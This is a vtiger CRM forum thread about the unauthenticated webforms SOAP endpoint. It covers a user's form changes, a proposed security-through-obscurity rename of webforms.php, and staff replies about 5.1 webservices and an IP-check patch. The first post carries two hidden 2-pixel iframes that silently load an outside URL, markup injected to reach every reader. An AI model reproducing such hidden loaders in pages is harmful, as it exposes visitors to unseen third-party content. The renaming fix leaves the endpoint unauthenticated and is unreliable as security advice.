The webforms work simply enough.
But I am concerned about security.
It seems that a webform setup anywhere, with the config.php modified to point to ANY valid vtiger installation, can push data from that form into a vtiger installation. There is no authentication.
Please correct me if I am incorrect, but this IS a HUGE security risk.
Whats to stop someone from posting via the webforms to any number of vtiger installations?
What is the solution? I am sure a key or password mechanism would work fine. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe> <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>
Comments
our webform implementation is very basic right now. we are planning to enhance the feature in the upcoming release.
regards,
prasad
vtiger team
yes, i realize it is very basic.
i have just recently added more fields and a captcha to my forms, but realized the backend doesn't seem to have any security.
i assume you are in agreement with my observations.
i would like to put my own check or password based auth into the backend so that it is actually secure.
i am a new programmer, and i would appreciate any pointers on which file (probably in the soap backend) i would need to add the password check.
i already have added session based checking for variable holding so it should be trivial to pass a token or key.
i just don't know the code well enough to understand where the data gets passed to.
the data gets passed on to vtigercrm/soap/webforms.php , which handles soap request from webforms.
please do keep us updated with your modifications.
thank you,
prasad
vtiger team
first i will start with my current modifications.
*** features ***
more entry fields
firstname *required
lastname *required
company *required
email * required
phone
street
city
country
description
recapture spam protection
email notification of webform submittal
the email notification code was borrowed from another forum post i found earlier.
my modifications involve these files.
/webforms/lead/index.php
/webforms/lead/send_data.php
(vtigerhostname)/soap/webforms.php
and i added these files.
/webforms/lead/form.css
/webforms/lead/validateform.js (pulled from index.php and modified)
/webforms/lead/recaptchalib.php (received from <!-- m --><a class="postlink" href="http://recaptcha.net/whyrecaptcha.html">http://recaptcha.net/whyrecaptcha.html</a><!-- m --> , please go there to sign up and get captcha on your form)
/webforms/lead/oops.png
that is that the form data is kept if a user presses the back button between filling out the form and submitting it.
now my idea for hacking in some form of security.
---
the major problem as i see it, is there is no checking via the webforms.php on where the data that is being sent to comes from.
i don't have an elegant solution at the moment. ( i am not a terribly good programmer)
but, there is a solution.
the basic idea behind this fix, is that in order to exploit the webforms soap interface, the exploiter must know how to access the processing form, in this case webforms.php.
this idea, is security through obscurity. we rename webforms.php and the name of the soap service and change the code in the required files.
for example.
it requires modification of these files.
change vtigerservice.php
change this line
to (it should actually be any random string of your choosing)
change send_data.php
to (match the service name entered in vtigerservice.php)
and finally rename
webforms.php
to
udhy382j.php (match the vtigerservice.php entry as well.)
i don't know if any other pages rely on the presence of webforms.php but for now this should provide a small level of security, through obscurity.
if you are not using webforms plugin for your site, i would recommend you to rename soap/webforms.php to soap/webforms.php.txt
in 5.1 we are planning to provide better webforms integration using vtiger crm webservices.
regards,
prasad
vtiger team
i'm currently working on a project that this would help tremendously. right now i'm using a home grown multi-threaded web server with its own webservice system - which takes the place of the php entirely.
it's very secure - session based - ip address verified each call etc... but if the vtiger team has a secure alternative - than that could open more doors for various installations/integration etc.
the project i'm referring is a new a work in progress still - but the webservice stuff is coming along nicely.
webforms extension being developed is using the webservices api added for vtiger crm 5.1.0
kindly look at the following documentation for more details:
<!-- m --><a class="postlink" href="http://www.vtiger.com/archives/validation/5.1/2008.10/vtigercrm_5.1.0_webservices.pdf">http://www.vtiger.com/archives/validati ... rvices.pdf</a><!-- m -->
related post:
<!-- m --><a class="postlink" href="http://www.vtiger.com/blogs/2008/10/23/vtiger-crm-web-services/">http://www.vtiger.com/blogs/2008/10/23/ ... -services/</a><!-- m -->
regards,
prasad
vtiger team
to secure some installation we have added an ip validation check on webforms.php.
this could be useful for all people who need webforms whitin 5.0.4
if someone is interested we can post the code here
regards
dade
i would certainly encourage you to share the code here.
if possible please do post it on <!-- m --><a class="postlink" href="http://trac.vtiger.com">http://trac.vtiger.com</a><!-- m --> and share the patch.
regards,
prasad
vtiger team